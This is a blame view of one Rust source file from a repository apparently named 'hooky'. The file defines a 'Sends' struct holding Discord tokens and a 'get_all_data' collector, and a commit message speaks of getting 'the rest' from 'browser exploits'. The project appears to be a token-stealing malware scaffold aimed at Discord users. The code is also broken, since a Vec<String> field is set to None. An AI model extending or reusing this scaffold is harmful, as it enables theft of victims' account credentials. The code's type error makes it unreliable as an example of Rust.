~/hooky

hooky/data/src/lib.rs -rw-r--r-- 492 B
61266a51 — Arthur Melton only one discord the rest can get got from browser exploits 2 years ago

            
583b1720 Arthur Melton
1ce8d56c Arthur Melton
c1f59a62 Arthur Melton
583b1720 Arthur Melton
61266a51 Arthur Melton
583b1720 Arthur Melton
1ce8d56c Arthur Melton
583b1720 Arthur Melton
03bd875f Arthur Melton
583b1720 Arthur Melton
1ce8d56c Arthur Melton
583b1720 Arthur Melton
61266a51 Arthur Melton
583b1720 Arthur Melton












1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
use serde_derive::{Deserialize, Serialize};

#[cfg(feature = "functions")]
mod all_data;

#[derive(Deserialize, Serialize, Clone)]
pub struct Sends {
    pub discord_token: Vec<String>,
}

#[cfg(feature = "functions")]
impl Sends {
    pub fn init() -> Sends {
        Sends {
            discord_token: None,
        }
    }
}

#[cfg(feature = "functions")]
pub fn get_all_data() -> Sends {
    let mut sends = Sends::init();
    #[cfg(feature = "discord")]
    sends.discord();
    sends
}